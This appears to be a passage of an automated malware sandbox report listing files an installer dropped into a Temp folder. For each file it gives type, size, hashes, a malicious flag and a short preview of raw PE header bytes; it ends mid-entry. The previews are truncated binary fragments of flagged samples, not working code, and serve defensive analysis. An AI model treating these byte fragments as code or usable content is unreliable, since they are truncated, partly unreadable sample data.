                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.m. ... ... ...4...*...4...3...4......r...j...r...0...r...*...4...+... .........&......!......!... ..!......!...Rich ...................PE..d...}..b.........." ......................................................................`.........................................PL..h....L..x...............<*.......)......0.......p...........................P...8............................................text............................... ..`.rdata...H.......J..................@..@.data...$(...`.......@..............@....pdata..<*.......,...R..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):63960
                                                                                                                                                                                                                                        Entropy (8bit):5.985053093940967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:UuH8cM6INO6I16K2pa2slcJCKKSg8gD7mN9f9xg8:UuM7NO6IOpa2ocJCSDgDe9E8
                                                                                                                                                                                                                                        MD5:E1AD97477B7DCF44C45617AF1C5F42A7
                                                                                                                                                                                                                                        SHA1:3C4EE0BDAEE0D2F5AA2FEC0B123941E4EF502A7B
                                                                                                                                                                                                                                        SHA-256:715B44973C9999CE10DA2EAA29FA566CCFDFA6E013F839CD51BD8D54E470E1AF
                                                                                                                                                                                                                                        SHA-512:355844A975DBACC5D205E5739C9A8ABA82C5E2A6B80A4EB0CECCC3BC4465A987440C65982A69D65547BD610D60457B835289C0ECC5609CD4EB62DAF9EB329B36
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Jb..........."...0.................. .....@..... ...................................`...@......@............... ..................................L................)..........0...8............................................................ ..H............text....... ...................... ..`.rsrc...L...........................@..@........................................H.......(`..Pz..........x................................................0..........s..........r...p(....9....r...ps......r5..po.....ro..p(....o....o....o....r...p(.....o.......,..o ......}....~....(!...-.~....("...&.{....r...p(....o....o....o....(#...o:....{....r...po:...~....r...p(#...(!...,Q~....rM..p(#...(!...-.~....rM..p(#...("...&~....r...p(#...~....rM..p(#....($...+..{....re..po:...~....r...p(#...(!...,U~....r...p(#...(!...-.~....r...p(#...("...&~....r...p(#...~....r...p(#...r
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):527320
                                                                                                                                                                                                                                        Entropy (8bit):6.22744816940077
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+PaSEq5lUX1rPekNDSa98OOeOJrigKDdfAWPuLvH6p+g967teje:+N581rPekNDSa98OOeOJriTfTWLvap+d
                                                                                                                                                                                                                                        MD5:40D9C2903AE6095C3DCF4EC8D92165E0
                                                                                                                                                                                                                                        SHA1:F60ED95B66DE812D1074731A4CCD8086162095CE
                                                                                                                                                                                                                                        SHA-256:824D165E9C147B0EB0628086F24F35A2C84BCDD923217537F65CD9881A415724
                                                                                                                                                                                                                                        SHA-512:71E8F0B6B4F6F4F086026E7A0DBAFC5031BACEEEB3BBB6D14049EC2804AAF6A5077D0A93C31D79684C9D2BFBB11DECEEA0CE48AF9BCF5703F19F61101EC02309
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........H+O.&xO.&xO.&xF.x..&x.. yN.&x.."yG.&x..%yK.&x..#yn.&x..'yI.&x)..xM.&x..'yM.&x..!yN.&x.."yN.&x..'yA.&x..'yM.&x..'yL.&xO.'x.&x..#yK.&x../yG.&x..&yN.&x...xN.&xO..xM.&x..$yN.&xRichO.&x................PE..d....`.f.........." .........8.......M....................................... ......+i....`.........................................`O......<P..p...............\7.......)......$...`...p.......................(......8...............`............................text............................... ..`.rdata..............................@..@.data....&....... ...~..............@....pdata..\7.......8..................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.392900904102728
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hmtFJlpHwE3mKEUs7Z5YxPwlQOaYU7jw52/xPuiXC/8K8jcYa1o/7kIf:hmtFzpF2AHYU7jw52/xGiXC0K8Qx+/Xf
                                                                                                                                                                                                                                        MD5:419F5B0AD8C7A997FF45B0E78B8EB992
                                                                                                                                                                                                                                        SHA1:93785EF8A6CB10746843728933A41178D5C880C7
                                                                                                                                                                                                                                        SHA-256:899C543564E34D7796148F5E57D727879D180444CB193647C5BB0C6A009B46A0
                                                                                                                                                                                                                                        SHA-512:5E5336BCC2BAEC98551AE64B32EF89CFC68FF4B64A5802529E58120D3E682C8AD64426F1DA92838A1CFCC050C6B071D14A8C6723E0A4FAFD6DC8F6E46B93A683
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................\...,...,....P.......@..H....4.../...`......0...p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.388398823218999
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:we9rhlZHAE3GKE0s7Z54x/wJFxOJP0zyZL52/xP48yS/WGneBK8jcljEF4/7FP:we9rrZVW7UP02ZL52/xKS/WGmK8Ql/xP
                                                                                                                                                                                                                                        MD5:58E097F71CD3D820E56A57082F331F9B
                                                                                                                                                                                                                                        SHA1:E0ADDC85992A7984C1989E0139E35113EF5077CF
                                                                                                                                                                                                                                        SHA-256:D25311D8E66BDD0C66A048F390AC4801DDED8A4BEBD8C12683463BC093A16BFC
                                                                                                                                                                                                                                        SHA-512:2545405EA52B1998031D05E5AC8E8F1699DC563D0E29CC858389F0DC65EB716FFD65EC756583EB990EFCA89249C344AA67BC2189EBFBFEBDB2251CFF6B4B0DC8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................L.......,....P.......@..H....4.../...`..........p...........................p...8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):309136
                                                                                                                                                                                                                                        Entropy (8bit):6.409944760297986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:6G4+kHMYKM3WoU+iWS7eTAJxCmR/3ZNm11favAgAEoY46SvpKJa/VEulQuM/XWC:62wzrLU+iWTAJBF3Z6iohXsJa9SDL
                                                                                                                                                                                                                                        MD5:354F7EAB1FC24A19FB0B053B95CF07C1
                                                                                                                                                                                                                                        SHA1:1FE5C1641DC3896D63ABECEFF56D8AB06AD1B070
                                                                                                                                                                                                                                        SHA-256:BE45B0711DF735088D8889D16BFE8E5C68E23C23D25A8C4B0236851F68FBA341
                                                                                                                                                                                                                                        SHA-512:5ACEE14479C422E3143E1F0B498C974D025DA368B4BF6EEDA7045B241A3639C9C552CF12CD35E09C071346C1A7F19D1FEDDAA01F2DF4CBB16EDA9F8847B860DE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .A...A...A...*...A...*...A...*..$A...4...A...4...A...4...A...*...A...A..8A..z4...A..z4...A..z4p..A..z4...A..Rich.A..........PE..d......b.........." .........................................................@............`.........................................@;..T....;..P.... ...........*......./...0..|.......p........................... ...8...............P............................text...(........................... ..`.rdata...6.......8..................@..@.data........P.......<..............@....pdata...*.......,...N..............@..@_RDATA...............z..............@..@.rsrc........ .......|..............@..@.reloc..|....0.......~..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.49985673199024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2b7ppEkfpM8VfuwD/cPkgN/zf/vZ76FsWFcdlOrdYz7F9WWiAHrR:NHkYpM2uwD/cPNjhHlOZYz7F9WWiALR
                                                                                                                                                                                                                                        MD5:B95FCEF92642932A9992D13E256C571C
                                                                                                                                                                                                                                        SHA1:CB218CF9025B02657A06ECD409EDE09A3007FBC3
                                                                                                                                                                                                                                        SHA-256:51DF7F062D158CFFA5748249C6C4B0B3C9B75D03830AFD1B0D2D593941A917B0
                                                                                                                                                                                                                                        SHA-512:69AE204A24784F5D6FA63CCAF6E04128DB9DF5F823E903CD85F1B66B67A04F4A90DC37C3815B5BE7437021816BC230B5B9E35641B6A3AC5F5D23F0927FA48AE3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................=........................................"......"......".......q...."......Rich....................PE..L......a...........!................................................................&_....@.........................@6.......6..P....`...............H..0$...p.......+..p............................+..@...............,............................text............................... ..`.rdata..Z].......^..................@..@.data........@.......*..............@....rsrc........`.......4..............@..@.reloc.......p.......8..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):113928
                                                                                                                                                                                                                                        Entropy (8bit):6.140409022305705
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:xSrLvDkvN4UPAOfMEHJNt9UtNFsgTMfwSNY2jgXs:xSPrklAOkEDwSN1gc
                                                                                                                                                                                                                                        MD5:3B3BCDFBAAA9A2066A6701F6231DA621
                                                                                                                                                                                                                                        SHA1:B57F487D41BF6A673312D82C4595F54C1797144A
                                                                                                                                                                                                                                        SHA-256:233FB3277DB50ABDA86838B0691E10CF321180711ED345A46D631979B99501A2
                                                                                                                                                                                                                                        SHA-512:8194166C044A441D8AD7A781B36C80DB2F9E3E909CC9186BCF902EE8D331FB494BAFEB3090018159CBEC8FC3360F879A3EB710BFE2C000D20301C61E9777D990
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qV.M.8.M.8.M.8.(v<.G.8.(v;.H.8.(v=...8..x=.h.8..x<.C.8..x;.E.8.(v9.J.8.M.9...8..y1.O.8..y8.L.8..y.L.8.M...L.8..y:.L.8.RichM.8.........................PE..d......a.........." ................\.....................................................`..........................................y.......z..P........................%......(... e..p............................e..................p............................text............................... ..`.rdata..............................@..@.data................p..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2620496
                                                                                                                                                                                                                                        Entropy (8bit):6.585920836421845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:DkkOdZ7GfbhfKr3dSBmmvYphxOnWyVbgW7udHFBeWB61N/1oDRTrorVPTeB/CrCY:Dkm4SBmmgpPyVbgGN/1oNI5c/SRCbUUm
                                                                                                                                                                                                                                        MD5:39F452CDA9C88FB2D3BCD69E6187E803
                                                                                                                                                                                                                                        SHA1:9786EA3FC2C66240299279205CED1EDC803A002A
                                                                                                                                                                                                                                        SHA-256:212FB1753A42CFACDCD13FBAA62183AD4739C5AA720B1C49D8334DA37DA3B5D6
                                                                                                                                                                                                                                        SHA-512:4C5ED8F070423DE9C8EB034C3C1BBDA7EA225031A09D1BC234602C1DC46A702331036EFA92F764807347F8B9F92D0901D75A367F7FD388F160C7BAF57720CCD0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w..............n2......n$.t............n#.....D#.....=5.................._....n-."....n5......D3.......0......n6.....Rich............................PE..L...Z2 f...........!.....\...r......O........p............................... (.....he(...@..........................j .N...d[ .......".t.............'.P*...p&......s.................................@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...T>...p ......\ .............@....rsrc...t....."......x".............@..@.reloc.. ....p&......0&.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3240016
                                                                                                                                                                                                                                        Entropy (8bit):6.26282805728618
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:BejAIBTJv6nAMdFx5xpRJxZpg3aIxj2oT6VIZ7nhzyeHW3KCgv+UD:cTaoTNtas
                                                                                                                                                                                                                                        MD5:53EDB26B10553B11B83B4D6C00295827
                                                                                                                                                                                                                                        SHA1:7570619EB7B0734569FA74AF89A5A1CED5B169D2
                                                                                                                                                                                                                                        SHA-256:F8D56534C9304F583FF38A2CADE06D5E643A08A4161FF8C4BABDA2E9EBA99A8B
                                                                                                                                                                                                                                        SHA-512:BFC14952A0B1E0DDA2E02E03107703EAA21F7C27BC25B1180DC7D0C908AE75689FD6C7788081BF76DE8444D8A7C65D70122A2F2A4F84D263A4D720B1D514D395
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o..A..A..A..f._.@..Hv\....f..@..Hv[.5.._\[.D..7...@..f..P..A.....HvJ.L..HvU....HvM.@.._\K.@..A.H.@..HvN.@..RichA..........PE..d....2 f.........." .....(....................................................1.......1...@......................................... [).N....H)......`-.t....@,......F1.P*... 1..a...F...............................................@...............................text....&.......(.................. ..`.rdata..n....@.......,..............@..@.data........`)......H).............@....pdata.......@,.......+.............@..@.rsrc...t....`-.......-.............@..@.reloc..(.... 1.......0.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):566704
                                                                                                                                                                                                                                        Entropy (8bit):6.494428734965787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:M/Wn7JnU0QUgqtLe1fqSKnqEXG6IOaaal7wC/QaDWxncycIW6zuyLQEKZm+jWodj:yN59IW6zuAQEKZm+jWodEEY1u
                                                                                                                                                                                                                                        MD5:6DA7F4530EDB350CF9D967D969CCECF8
                                                                                                                                                                                                                                        SHA1:3E2681EA91F60A7A9EF2407399D13C1CA6AA71E9
                                                                                                                                                                                                                                        SHA-256:9FEE6F36547D6F6EA7CA0338655555DBA6BB0F798BC60334D29B94D1547DA4DA
                                                                                                                                                                                                                                        SHA-512:1F77F900215A4966F7F4E5D23B4AAAD203136CB8561F4E36F03F13659FE1FF4B81CAA75FEF557C890E108F28F0484AD2BAA825559114C0DAA588CF1DE6C1AFAB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y...................Z.........O.....O.....O.....O.....O.....O.6....O.....Rich...........................PE..d...%|.a.........." .....<...\.......)...................................................`A.........................................5..h...(...,............p...9...~...'......0.......T...............................8............P...............................text....;.......<.................. ..`.rdata..j....P.......@..............@..@.data...`:...0......................@....pdata...9...p...:...6..............@..@.rsrc................p..............@..@.reloc..0............t..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1495
                                                                                                                                                                                                                                        Entropy (8bit):4.948463579667309
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:p9u9bxMSpcP61aeNetQRuzY78aDx82RvUGI7VjIYUoGgDCAQ:i9bKSp6FeNmQO7evUlvUngDa
                                                                                                                                                                                                                                        MD5:090612B1C921F2D7094D80F6430733D5
                                                                                                                                                                                                                                        SHA1:050025F1B573B53F30BD06AF0D30FA4ACDC66FA9
                                                                                                                                                                                                                                        SHA-256:BDEB1DB80E2F10CD4D78F165A7348C3F1F7DAB8F263941081A1F8DE8A921751F
                                                                                                                                                                                                                                        SHA-512:17F7641F266138519A63A4D6B493C72B5F39140CB2CFA73B07168F71C4D16BE8FD847C4BBDD045337B06741496D2C573F10CBF43B1D632491CBEA5EFC9946B29
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:[XShortcuts]..File\Open=Ctrl+O..File\Exit=Alt+X..View\FullScreen=Ctrl+E..Strings\FollowIn\Hex=..Strings\Demangle=..Strings\Edit\String=..Signatures\Copy\Name=..Signatures\Copy\Signature=..Signatures\Copy\Address=..Signatures\Copy\Offset=..Signatures\FollowIn\Hex=..Hex\DataInspector=..Hex\DataConvertor=..Hex\Multisearch=..Hex\DumpToFile=Ctrl+D..Hex\GoTo\Offset=Ctrl+G..Hex\GoTo\Address=..Hex\GoTo\Selection\Start=..Hex\GoTo\Selection\End=..Hex\Signature=..Hex\Find\String=Ctrl+F..Hex\Find\Signature=..Hex\Find\Value=..Hex\Find\Next=F3..Hex\Select\All=Ctrl+A..Hex\Copy\Data=..Hex\Copy\Offset=..Hex\Copy\Address=..Hex\FollowIn\Disasm=..Hex\FollowIn\MemoryMap=..Hex\FollowIn\Hex=..Hex\Edit\Hex=..Hex\Edit\Remove=..Hex\Edit\Resize=..Hex\Strings=..Disasm\DumpToFile=Ctrl+D..Disasm\GoTo\Offset=..Disasm\GoTo\Address=Ctrl+G..Disasm\GoTo\EntryPoint=E..Disasm\GoTo\References=X..Disasm\Signature=Shift+G..Disasm\Hex\Signature=S..Disasm\Find\String=Ctrl+F..Disasm\Find\Signature=..Disasm\Find\Value=..Disasm\F
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):644096
                                                                                                                                                                                                                                        Entropy (8bit):5.526662897266232
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:U4ROKzRoNmA5OR6tPMQaRmvj4tMO5/vuUta7GTDrPnkR8edJH:DmmA5OjjHuGzv68edJH
                                                                                                                                                                                                                                        MD5:C3725B33DC3D5AC2CC041E015DD275FC
                                                                                                                                                                                                                                        SHA1:74D72B51047F1474F943CFD99B88DD081C7170C4
                                                                                                                                                                                                                                        SHA-256:36AC1D72044CFACC4C1E85D380EE6BA0976D4D7AA23068F0B7F204214A942995
                                                                                                                                                                                                                                        SHA-512:DF25CC9F19A044449D70535BD8E5ED0B1C3BFD40E4E4904A7F495E8A06023CA695D28F81CD1D65F02EA86859C261F8DF502499BD0B06DB19F56B6299C329CFCC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............B..B..B..IB..B..DB..B..qB..B..FB..B..B1..B..pB..B..AB..B..@B..B..GB..BRich..B........................PE..d...X.6`.........." .........D.......v....................................... ............@..............................................N......P.......s....0..8O..............8...P...................................................0............................text.............................. ..`.rdata...'.......(..................@..@.data....K.......D..................@....pdata..PX...0...Z..................@..@.idata...Q.......R...^..............@....rsrc...s...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23944
                                                                                                                                                                                                                                        Entropy (8bit):5.991779991904571
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:fXt9apR9EFsN2iWcs5gWjcKLHRN7IVslGssA:fXK79EFsEHKAmS
                                                                                                                                                                                                                                        MD5:0832532FAB0D5C949AA0C65169AA9D61
                                                                                                                                                                                                                                        SHA1:26F1BEE679B7A6289B663C4FA4E65EBA33A234E8
                                                                                                                                                                                                                                        SHA-256:8731A93E519C2595C9FD489E6D9AC07E964448C0DA1C8EE9EE500A7989482617
                                                                                                                                                                                                                                        SHA-512:03147A59EE35FB3D2752D4C40741A39674CCD4474A575746BC574D2B2FAE1FD04F5AB9C2E02B0DC6268FC6AEE8FBB46DC4BF5FF23B5FCC4A0E9B847F57CA79D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h...h...h.......h.......h......h......h...h...h......h......h......h...g..h......h..Rich.h..........................PE..d...*|.a.........." .........$.......................................................Y....`A........................................P?..L....@..x....p.......`.......:...#......|...@3..T............................3..8............0..0............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`.......0..............@..@.rsrc........p.......4..............@..@.reloc..|............8..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308624
                                                                                                                                                                                                                                        Entropy (8bit):6.413892452925429
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7Txyvl7lz0d6XtdxlHV3fsLvCfohMj1SJbxf:7dyvlV0cxv3ckoQoNxf
                                                                                                                                                                                                                                        MD5:DFA7ABA0155B6D01B1469AFFD7EF2517
                                                                                                                                                                                                                                        SHA1:FDCCEFBA3F59E8A135E2CD9ABDCBC091192F0AA0
                                                                                                                                                                                                                                        SHA-256:A4D60D7C86253D4680BDFCA014E64DB34090850B5CEBD5C032E5A63A484C7CD6
                                                                                                                                                                                                                                        SHA-512:5A2533CEFE2D3F930C7434BF40E271DCC6711066030F03E4F9E53E7F095160BB0B60259401333E21DEACAD9F3DD1063F005906D4B15A933E1A5388A20B98F64C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1k.*u..yu..yu..yaa.x...yaa.xf..yaa.x...y'..xe..y'..x...yaa.xt..y'..x1..yaa.xx..yu..y...y...xs..y...xt..y...yt..y...xt..yRichu..y................PE..d...w..b.........." ................4................................................q....`..........................................>..P....>..x................*......./..........@...p...............................8............................................text...n........................... ..`.rdata...;.......<..................@..@.data....'...P.......:..............@....pdata...*.......,...L..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............|..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1243120
                                                                                                                                                                                                                                        Entropy (8bit):6.352658342244649
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:xO2knvJZKtd04kMCZZGiCS2BULn64WYdyczxJlH:xO2knvJZIgMCqonlrDH
                                                                                                                                                                                                                                        MD5:03C6C0A60C0D3E7FA86B4388F4CBCCB6
                                                                                                                                                                                                                                        SHA1:CDDAA47FD8C1A7DE32C2376F27EDCFC594E92074
                                                                                                                                                                                                                                        SHA-256:0B58E5E79DF13110A8258F14D7B3658D1DD0C8DDDC337A164B89D4AC12A0638F
                                                                                                                                                                                                                                        SHA-512:A297DB87EE1055190580AD2BC539E89E38729DCB9EA9075DC535B05CB45C62F1B0FC99D8866047383CF519D7DDE4016CC4EE0D5796190635AEB3D5C2F5E7CD2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......e>..!_.F!_.F!_.F('/F1_.F..{F _.F.0.G7_.F.0.G)_.F.0.G%_.F.0.G%_.F54.G%_.F./.G"_.F!_.F.^.F./.G._.F./.G _.F./CF _.F!_+F _.F./.G _.FRich!_.F........................PE..d......_.........." ......................................................... ......Z.....`.........................................p....h..|................ .................x-......T...................@...(.......0............................................text............................... ..`.rdata..............................@..@.data....5..........................@....pdata...... ......................@..@.rsrc...............................@..@.reloc..x-..........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2882984
